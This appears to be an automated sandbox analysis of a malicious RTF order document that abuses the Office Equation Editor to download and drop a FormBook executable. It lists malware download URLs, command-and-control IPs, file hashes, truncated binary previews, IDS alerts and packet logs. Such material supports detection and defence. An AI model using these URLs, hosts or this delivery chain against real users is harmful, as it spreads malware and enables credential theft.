                                                            • samsung-tv.tk/arinzezx.exe
                                                            my orderPDF.exeGet hashmaliciousBrowse
                                                            • drossmnfg.com/stallion/index.php
                                                            Order Speficications.docGet hashmaliciousBrowse
                                                            • samsung-tv.tk/urchzx.exe
                                                            temp order (2).exeGet hashmaliciousBrowse
                                                            • drossmnfg.com/stallion/index.php
                                                            444order.docGet hashmaliciousBrowse
                                                            • kizitox.ga/doziezx.exe
                                                            SCANNED DOCUMENT.docGet hashmaliciousBrowse
                                                            • samsung-tv.tk/obizx.exe
                                                            HOLLAND - TEKL#U0130F MEKTUBU - 19,11,2021 - T.D.docGet hashmaliciousBrowse
                                                            • kizitox.ga/chungzx.exe

                                                            Domains

                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                            dell-tv.tkQuotation No. Q07387.docGet hashmaliciousBrowse
                                                            • 37.0.9.166
                                                            Swift Copy TT.docGet hashmaliciousBrowse
                                                            • 37.0.9.166
                                                            nwamafour.exeGet hashmaliciousBrowse
                                                            • 162.215.241.145
                                                            nwamafour.exeGet hashmaliciousBrowse
                                                            • 162.215.241.145
                                                            WeChat image_20210422104940_PDF.exeGet hashmaliciousBrowse
                                                            • 162.215.241.145

                                                            ASN

                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                            CLOUDFLARENETUSQuotation No. Q07387.docGet hashmaliciousBrowse
                                                            • 104.21.19.200
                                                            hSlk750R2b.exeGet hashmaliciousBrowse
                                                            • 104.23.98.190
                                                            Order Contract_signed (2NQ39NGAY0GD).ppamGet hashmaliciousBrowse
                                                            • 104.16.203.237
                                                            Halbank Ekstre 2021101 073653 270424.exeGet hashmaliciousBrowse
                                                            • 172.67.188.154
                                                            Hong Jin International Co Ltd -Order Specification.exeGet hashmaliciousBrowse
                                                            • 104.21.19.200
                                                            ORDER PROPOSAL.exeGet hashmaliciousBrowse
                                                            • 162.159.134.233
                                                            8p2NlqFgew.exeGet hashmaliciousBrowse
                                                            • 162.159.135.233
                                                            TT COPY_02101011.exeGet hashmaliciousBrowse
                                                            • 172.67.158.42
                                                            GZ4OR9sIdP.exeGet hashmaliciousBrowse
                                                            • 172.67.188.154
                                                            4lWWTrEJuS.exeGet hashmaliciousBrowse
                                                            • 104.21.31.203
                                                            TT_SWIFT_Export Order_noref S10SMG00318021.exeGet hashmaliciousBrowse
                                                            • 23.227.38.74
                                                            TxIDbatch#7809.htmGet hashmaliciousBrowse
                                                            • 104.16.18.94
                                                            Se adjunta el pedido, proforma.exeGet hashmaliciousBrowse
                                                            • 162.159.134.233
                                                            Google_Play_Store_flow_split.apkGet hashmaliciousBrowse
                                                            • 104.21.4.48
                                                            Statement.htmlGet hashmaliciousBrowse
                                                            • 104.16.18.94
                                                            Employee payment plan.HTMGet hashmaliciousBrowse
                                                            • 104.18.10.207
                                                            S9yf6BkjhTQUbHE.exeGet hashmaliciousBrowse
                                                            • 172.67.178.31
                                                            Halbank Ekstre 2021101 073653 270424.exeGet hashmaliciousBrowse
                                                            • 172.67.188.154
                                                            yH8giB6jJ2.exeGet hashmaliciousBrowse
                                                            • 162.159.135.233
                                                            pwY5ozOzpYGet hashmaliciousBrowse
                                                            • 172.64.209.6
                                                            WKD-ASIEQuotation No. Q07387.docGet hashmaliciousBrowse
                                                            • 37.0.9.166
                                                            0VDGA4mWCE.exeGet hashmaliciousBrowse
                                                            • 37.0.10.250
                                                            Payment+Advice.docGet hashmaliciousBrowse
                                                            • 37.0.11.230
                                                            Swift Copy TT.docGet hashmaliciousBrowse
                                                            • 37.0.9.166
                                                            Invitation PQ Documents Submission QTN.(#U007eMB).docGet hashmaliciousBrowse
                                                            • 37.0.11.230
                                                            PO201808143_330542IMG_20200710_0008.rtfGet hashmaliciousBrowse
                                                            • 37.0.11.230
                                                            874578.docGet hashmaliciousBrowse
                                                            • 37.0.11.230
                                                            2020 year financial report.docGet hashmaliciousBrowse
                                                            • 37.0.11.230
                                                            Payment Advice.docGet hashmaliciousBrowse
                                                            • 37.0.11.230
                                                            PO 36457967.docGet hashmaliciousBrowse
                                                            • 37.0.11.230
                                                            QUOTE20212411.docGet hashmaliciousBrowse
                                                            • 37.0.11.230
                                                            Order ID 1426095239.docGet hashmaliciousBrowse
                                                            • 37.0.9.166
                                                            PAYMENT2021A0087NOV.docGet hashmaliciousBrowse
                                                            • 37.0.9.166
                                                            Temp Order2.exeGet hashmaliciousBrowse
                                                            • 37.0.9.166
                                                            162AB00C0E943F9548B04F3437867508656480585369C.exeGet hashmaliciousBrowse
                                                            • 37.0.11.8
                                                            Rev_NN doccument.docGet hashmaliciousBrowse
                                                            • 37.0.9.166
                                                            20211122.docGet hashmaliciousBrowse
                                                            • 37.0.9.166
                                                            PO-20212222.docGet hashmaliciousBrowse
                                                            • 37.0.9.166
                                                            BANK DETAILS.docGet hashmaliciousBrowse
                                                            • 37.0.9.166
                                                            50% TT advance copy.docGet hashmaliciousBrowse
                                                            • 37.0.9.166

                                                            JA3 Fingerprints

                                                            No context

                                                            Dropped Files

                                                            No context

                                                            Created / dropped Files

                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ashlyzx[1].exe
                                                            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:downloaded
                                                            Size (bytes):560128
                                                            Entropy (8bit):7.648991597743519
                                                            Encrypted:false
                                                            SSDEEP:12288:XBzcmhiTopuBWTgKY6VnDe9k2X9/KPMsh8S7P/TyjixBFmRq:XBomhisIWAIDe9HtK1h8Srbyji1Wq
                                                            MD5:D236BB1F86CAEC110ABB20FC2360E25B
                                                            SHA1:0611498ED409D30150D2A0B2A6426E5CB9504D8A
                                                            SHA-256:2F08F5B23A062671FBA5957B98D05A728299BB1AE98695B9B5D36E75528CCAB7
                                                            SHA-512:4F1B645A4710291C197F25E7C7258D5D4D2F710607412228DEBA8D7A1C172FDD6D82DB2C791C6D6064E405AA577DDC1BF469D6EB8C2241A0ACB068A31F3490D1
                                                            Malicious:true
                                                            Reputation:low
                                                            IE Cache URL:http://dell-tv.tk/ashlyzx.exe
                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....a..............0.................. ........@.. ....................................@....................................O.......p............................................................................ ............... ..H............text...t.... ...................... ..`.rsrc...p...........................@..@.reloc..............................@..B........................H........H...!..........dj..`4............................................s....}.....s ...}.....(!....(.....{.....o"...*.0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(*...-...........o.....*..................{....o+....{....o,...o-.....}....*.0..)........{.........(....t......|......(...+...3.*....0..)........{.........(0...t......|......(...+...3.*....0..........
                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{3D999299-2169-4632-82B1-6FEE86AD4ADA}.tmp
                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                            File Type:Composite Document File V2 Document, Cannot read section info
                                                            Category:dropped
                                                            Size (bytes):5632
                                                            Entropy (8bit):4.139240799996483
                                                            Encrypted:false
                                                            SSDEEP:48:roMMP9awF8kcQNxFYCiMjbi3sAT3ZMidDs9n5bSUEppRu+:/MPD8kcYHJjezIENdl
                                                            MD5:B020D2CE44C467E09C418C1F777299A6
                                                            SHA1:D0394BC7ED85C851703043A84F028B3CA6C47B5B
                                                            SHA-256:2A81E3D4E24096064B48F6E027444A37E9FADD9375DD5ADCDD69AED75F847769
                                                            SHA-512:5E89FD1536298E0D1AEA1C9C2A5C6744CFC52F4830C0CBCA7A828912067972502AAA069EC94B1C0746FB5A9696C13F84A1865DD9A721D02C9857E934C2B3C6E5
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            Reputation:low
                                                            Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{1301DF5A-9B1F-4290-90EE-2E8BF9838615}.tmp
                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):1024
                                                            Entropy (8bit):0.05390218305374581
                                                            Encrypted:false
                                                            SSDEEP:3:ol3lYdn:4Wn
                                                            MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                            SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                            SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                            SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                            Malicious:false
                                                            Reputation:high, very likely benign file
                                                            Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{780FD6C6-AC2E-47FB-9E8C-CE3647E85B1F}.tmp
                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):16896
                                                            Entropy (8bit):3.570527510134586
                                                            Encrypted:false
                                                            SSDEEP:384:8BuQrm+Mk+CkPYTJxgdHjGdIfZ3fbTreF8FNWZ:8EQKvk+BPYl9Kvz/WZ
                                                            MD5:D7466498EA7397EC632CB793A4B67FB8
                                                            SHA1:EA7FABB10EE13095DD52A380F1C9D3130714D58A
                                                            SHA-256:F09706A2416ABDA332F431EE91348A088DBF4F8D6F0702CCAFF28B8EB5A6CF32
                                                            SHA-512:F0638D0187B7B7F48262298C84A18B63E381C096CE78A65ED7E72EBD166C1E62D386E1B0B562021C4F218BE36C1C7F79A148E51ADE663A3E365E2738C7B3D40D
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview: '.=.?...&.=.+...?.2.4.>.[./.^.!.2.-.|.?.?.?.|.$.?.%.^.%.*.`.+.9.,.#.?.?.%.8.6...?.#.<.'.;.+.6.|.'.0.+.%.@.|._._.'.6.,.|...<.7.`._.(.<.0.0.=.9.;.&...2.&.=.=.?.(.?.1.>.#...4.-.~._.2.?.~.(.4./.|.0...,.].|...(.?.?...1.?.@.<.~.'.?.'._.|.?.4.].[.&.@.$.?.#.?.?.&.^.@.).;.|.(.].3.~.`._.<.?.,.`.5.~.(.`.7.-.?.>.;.(.).<.^.+.^.!.,.4.6.~.7.7.]./._.?.#.0.2.,.:.?.].|.8.|.].4...^.].&.|.?.%._.9.%.?.4.).3...~.4.?...?.^.&.[.$.?.;.?.=.&.%.5...@...;.~.>.;.?.%...4.%.?.&.;.).:.(.;.+.$.3.[.?.0.?...3.[.?.1.1.../.2...]...7.2.3...>.;.0.5...=.:.1.*.].=.?.2.*.?.?.?.*.[...|.?.&.;.;.?.).7.?.'.%.[.'.%.8.?.6.%...?.7.#.'.9.3.).$.;.?.;.4.3.].&.!.$.#.4.?...?.^.%.?.3.*.'.[.?.5.(./.%.?.^.&.'.'.$.~.@.9.1.^.9.).6.|.^.>.>.;.&.6.>.#.*.4.!.&.:.`././.1.[.6.1.0.~.:...`.?.1.]./.~.-.+.?.%.?.?.?.0.~.?.~.0.,.4.~...?.?.=.%.?.%.`.|.&.|.$.+.:.?.4.%.?.8._.1.;.8.1.9.?.~...?.).?..._.7.-.~.^.=.$._.?.?.~...].......1.).=.!.0.4...:.4.*.2.1.'.2.7.)...~.?.8.$.....:.3.)./.1.~._.?.!.4.:.9.:.!..._.#.>.@.<...!.!...;.=.&.:.~.^.:.%.0.?.8.;...~.!.+.=.1.
                                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\P.O-5433ERE.LNK
                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Aug 30 20:08:57 2021, mtime=Mon Aug 30 20:08:57 2021, atime=Fri Nov 26 01:08:15 2021, length=21635, window=hide
                                                            Category:dropped
                                                            Size (bytes):1019
                                                            Entropy (8bit):4.530153378570899
                                                            Encrypted:false
                                                            SSDEEP:24:8CNeq7k/XTuzLIvcNe9sgmDv3q6iQd7Qy:8CNeq7k/XTkIcNgzttUj
                                                            MD5:9892E2ECCDB56857139B89D1CC41DE9B
                                                            SHA1:B0965C6B38F9190AB9FDA1770B43F5F5E5D746FE
                                                            SHA-256:896A255ACA90326B2CAAA3F51EB0AB779DA76525EF9FD3232CCD910DAA9787D8
                                                            SHA-512:8778AFD4B7FF99A07DEF6495861076998BB6BC566465E36AF84414B164B6577B36825B629F0B3C78D60661FDE9A5B094DEC90B14EA0DF4F9EDE8EE17B0C2D3BE
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview: L..................F.... ......?......?...;..yj....T...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......S ...user.8......QK.X.S .*...&=....U...............A.l.b.u.s.....z.1......S!...Desktop.d......QK.X.S!.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....h.2..T..zS.. .PO-543~1.DOC..L.......S...S..*.........................P...O.-.5.4.3.3.E.R.E...d.o.c.......y...............-...8...[............?J......C:\Users\..#...................\\376483\Users.user\Desktop\P.O-5433ERE.doc.&.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.P...O.-.5.4.3.3.E.R.E...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......376483..........D_....3N...W...9..g............[D_....3N...W...9.
                                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):73
                                                            Entropy (8bit):4.773958169341782
                                                            Encrypted:false
                                                            SSDEEP:3:bDuMJltejggLFXVomX1BzEggLFXVov:bCmeEOBVh/OBVy
                                                            MD5:131E7683725D996AEC21A1F5847BCDE0
                                                            SHA1:D2072FE38996DC116BB8F83FAA6EB06DA12A12BC
                                                            SHA-256:5C4CEDA284DE11D195F3FFBE973AFE37C644D83E539A0FD45D669DE21AC889E3
                                                            SHA-512:B54A862B3A415138850784C131BCB85F43BFDA6F2E39C737C18A6347450BB94F79F1C813486E42AA4316DD291A7A88C533355C1DB48117FF3B431BFE46023BF5
                                                            Malicious:false
                                                            Preview: [folders]..Templates.LNK=0..P.O-5433ERE.LNK=0..[doc]..P.O-5433ERE.LNK=0..
                                                            C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):162
                                                            Entropy (8bit):2.5038355507075254
                                                            Encrypted:false
                                                            SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                                                            MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                                                            SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                                                            SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                                                            SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                                                            Malicious:false
                                                            Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                            C:\Users\user\AppData\Roaming\ashlkyvc7592.exe
                                                            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):560128
                                                            Entropy (8bit):7.648991597743519
                                                            Encrypted:false
                                                            SSDEEP:12288:XBzcmhiTopuBWTgKY6VnDe9k2X9/KPMsh8S7P/TyjixBFmRq:XBomhisIWAIDe9HtK1h8Srbyji1Wq
                                                            MD5:D236BB1F86CAEC110ABB20FC2360E25B
                                                            SHA1:0611498ED409D30150D2A0B2A6426E5CB9504D8A
                                                            SHA-256:2F08F5B23A062671FBA5957B98D05A728299BB1AE98695B9B5D36E75528CCAB7
                                                            SHA-512:4F1B645A4710291C197F25E7C7258D5D4D2F710607412228DEBA8D7A1C172FDD6D82DB2C791C6D6064E405AA577DDC1BF469D6EB8C2241A0ACB068A31F3490D1
                                                            Malicious:true
                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....a..............0.................. ........@.. ....................................@....................................O.......p............................................................................ ............... ..H............text...t.... ...................... ..`.rsrc...p...........................@..@.reloc..............................@..B........................H........H...!..........dj..`4............................................s....}.....s ...}.....(!....(.....{.....o"...*.0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(*...-...........o.....*..................{....o+....{....o,...o-.....}....*.0..)........{.........(....t......|......(...+...3.*....0..)........{.........(0...t......|......(...+...3.*....0..........
                                                            C:\Users\user\Desktop\~$O-5433ERE.doc
                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):162
                                                            Entropy (8bit):2.5038355507075254
                                                            Encrypted:false
                                                            SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                                                            MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                                                            SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                                                            SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                                                            SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                                                            Malicious:false
                                                            Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                                            Static File Info

                                                            General

                                                            File type:Rich Text Format data, unknown version
                                                            Entropy (8bit):4.45528097771043
                                                            TrID:
                                                            • Rich Text Format (5005/1) 55.56%
                                                            • Rich Text Format (4004/1) 44.44%
                                                            File name:P.O-5433ERE.doc
                                                            File size:21635
                                                            MD5:17ca06000e92058f0d43259b2683537c
                                                            SHA1:db453e5125310d209fe04fb0211677d79d25f3ee
                                                            SHA256:3c9280552a4129fdf884414b080c80d5ffc72403079d7a5292e9b09d832ab37d
                                                            SHA512:3e05cc9f7284eb7a1d6756380882b0b1b2d89ce42b887e6c28c49342a9ce61157392997f7bdd96add1fbeefe3ea2ce07c14e8b1e6b245488a2c248d0b8e51148
                                                            SSDEEP:384:ziXxa+OcfzOxCtiij+jSAF5yQZ5v8dqhS/MF0rDXjq/:mxdy4tiij+jSy/iqhf
                                                            File Content Preview:{\rtf713'=?.&=+.?24>[/^!2-|???|$?%^%*`+9,#??%86.?#<';+6|'0+%@|__'6,|.<7`_(<00=9;&.2&==?(?1>#.4-~_2?~(4/|0.,]|.(??.1?@<~'?'_|?4][&@$?#??&^@);|(]3~`_<?,`5~(`7-?>;()<^+^!,46~77]/_?#02,:?]|8|]4.^]&|?%_9%?4)3.~4?.?^&[$?;?=&%5.@.;~>;?%.4%?&;):(;+$3[?0?.3[?11./2

                                                            File Icon

                                                            Icon Hash:e4eea2aaa4b4b4a4

                                                            Static RTF Info

                                                            Objects

                                                            IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                                                            000001F62hno
                                                            100001F16h2embeddedEqUatIon.31614no

                                                            Network Behavior

                                                            Snort IDS Alerts

                                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                            11/25/21-18:10:21.768246TCP2031453ET TROJAN FormBook CnC Checkin (GET)4916680192.168.2.22144.91.75.9
                                                            11/25/21-18:10:21.768246TCP2031449ET TROJAN FormBook CnC Checkin (GET)4916680192.168.2.22144.91.75.9
                                                            11/25/21-18:10:21.768246TCP2031412ET TROJAN FormBook CnC Checkin (GET)4916680192.168.2.22144.91.75.9
                                                            11/25/21-18:10:31.987537TCP2031453ET TROJAN FormBook CnC Checkin (GET)4916780192.168.2.2234.102.136.180
                                                            11/25/21-18:10:31.987537TCP2031449ET TROJAN FormBook CnC Checkin (GET)4916780192.168.2.2234.102.136.180
                                                            11/25/21-18:10:31.987537TCP2031412ET TROJAN FormBook CnC Checkin (GET)4916780192.168.2.2234.102.136.180
                                                            11/25/21-18:10:32.106174TCP1201ATTACK-RESPONSES 403 Forbidden804916734.102.136.180192.168.2.22
                                                            11/25/21-18:10:37.240250TCP2031453ET TROJAN FormBook CnC Checkin (GET)4916880192.168.2.2234.102.136.180
                                                            11/25/21-18:10:37.240250TCP2031449ET TROJAN FormBook CnC Checkin (GET)4916880192.168.2.2234.102.136.180
                                                            11/25/21-18:10:37.240250TCP2031412ET TROJAN FormBook CnC Checkin (GET)4916880192.168.2.2234.102.136.180
                                                            11/25/21-18:10:37.357869TCP1201ATTACK-RESPONSES 403 Forbidden804916834.102.136.180192.168.2.22

                                                            Network Port Distribution

                                                            TCP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Nov 25, 2021 18:08:39.144543886 CET4916580192.168.2.2237.0.9.166
                                                            Nov 25, 2021 18:08:39.172197104 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:39.172300100 CET4916580192.168.2.2237.0.9.166
                                                            Nov 25, 2021 18:08:39.172686100 CET4916580192.168.2.2237.0.9.166
                                                            Nov 25, 2021 18:08:39.200264931 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:39.202337980 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:39.202358961 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:39.202399969 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:39.202477932 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:39.202503920 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:39.202521086 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:39.202532053 CET4916580192.168.2.2237.0.9.166
                                                            Nov 25, 2021 18:08:39.202568054 CET4916580192.168.2.2237.0.9.166
                                                            Nov 25, 2021 18:08:39.202580929 CET4916580192.168.2.2237.0.9.166
                                                            Nov 25, 2021 18:08:39.202594042 CET4916580192.168.2.2237.0.9.166
                                                            Nov 25, 2021 18:08:39.202670097 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:39.202718973 CET4916580192.168.2.2237.0.9.166
                                                            Nov 25, 2021 18:08:39.202744961 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:39.202792883 CET4916580192.168.2.2237.0.9.166
                                                            Nov 25, 2021 18:08:39.230190992 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:39.230221033 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:39.230232954 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:39.230246067 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:39.230258942 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:39.230289936 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:39.230309963 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:39.230319977 CET4916580192.168.2.2237.0.9.166
                                                            Nov 25, 2021 18:08:39.230360031 CET4916580192.168.2.2237.0.9.166
                                                            Nov 25, 2021 18:08:39.230364084 CET4916580192.168.2.2237.0.9.166
                                                            Nov 25, 2021 18:08:39.230365992 CET4916580192.168.2.2237.0.9.166
                                                            Nov 25, 2021 18:08:39.230367899 CET4916580192.168.2.2237.0.9.166
                                                            Nov 25, 2021 18:08:39.230370045 CET4916580192.168.2.2237.0.9.166
                                                            Nov 25, 2021 18:08:39.230371952 CET4916580192.168.2.2237.0.9.166
                                                            Nov 25, 2021 18:08:39.231187105 CET4916580192.168.2.2237.0.9.166
                                                            Nov 25, 2021 18:08:39.258021116 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:39.258049011 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:39.258079052 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:39.258127928 CET4916580192.168.2.2237.0.9.166
                                                            Nov 25, 2021 18:08:39.258153915 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:39.258163929 CET4916580192.168.2.2237.0.9.166
                                                            Nov 25, 2021 18:08:39.258173943 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:39.258191109 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:39.258203030 CET4916580192.168.2.2237.0.9.166
                                                            Nov 25, 2021 18:08:39.258208990 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:39.258234978 CET4916580192.168.2.2237.0.9.166
                                                            Nov 25, 2021 18:08:39.258260012 CET4916580192.168.2.2237.0.9.166
                                                            Nov 25, 2021 18:08:39.258315086 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:39.258332968 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:39.258369923 CET4916580192.168.2.2237.0.9.166
                                                            Nov 25, 2021 18:08:39.260016918 CET4916580192.168.2.2237.0.9.166
                                                            Nov 25, 2021 18:08:39.285830975 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:39.285857916 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:39.285871983 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:39.285886049 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:39.285936117 CET4916580192.168.2.2237.0.9.166
                                                            Nov 25, 2021 18:08:39.285938978 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:39.285959005 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:39.285968065 CET4916580192.168.2.2237.0.9.166
                                                            Nov 25, 2021 18:08:39.285974979 CET4916580192.168.2.2237.0.9.166
                                                            Nov 25, 2021 18:08:39.285979033 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:39.285998106 CET4916580192.168.2.2237.0.9.166
                                                            Nov 25, 2021 18:08:39.286014080 CET4916580192.168.2.2237.0.9.166
                                                            Nov 25, 2021 18:08:39.286031961 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:39.286067963 CET4916580192.168.2.2237.0.9.166
                                                            Nov 25, 2021 18:08:39.313581944 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:39.313611984 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:39.313626051 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:39.313638926 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:39.313668966 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:39.313749075 CET4916580192.168.2.2237.0.9.166
                                                            Nov 25, 2021 18:08:39.313786983 CET4916580192.168.2.2237.0.9.166
                                                            Nov 25, 2021 18:08:39.313790083 CET4916580192.168.2.2237.0.9.166
                                                            Nov 25, 2021 18:08:39.313792944 CET4916580192.168.2.2237.0.9.166
                                                            Nov 25, 2021 18:08:39.313795090 CET4916580192.168.2.2237.0.9.166
                                                            Nov 25, 2021 18:08:39.341367960 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:39.341401100 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:39.341444969 CET4916580192.168.2.2237.0.9.166
                                                            Nov 25, 2021 18:08:39.341645002 CET4916580192.168.2.2237.0.9.166
                                                            Nov 25, 2021 18:08:39.369299889 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:39.369411945 CET4916580192.168.2.2237.0.9.166
                                                            Nov 25, 2021 18:08:39.396967888 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:39.397115946 CET4916580192.168.2.2237.0.9.166
                                                            Nov 25, 2021 18:08:39.424694061 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:39.424722910 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:39.424876928 CET4916580192.168.2.2237.0.9.166
                                                            Nov 25, 2021 18:08:39.425214052 CET4916580192.168.2.2237.0.9.166
                                                            Nov 25, 2021 18:08:39.452599049 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:39.452650070 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:39.452728033 CET4916580192.168.2.2237.0.9.166
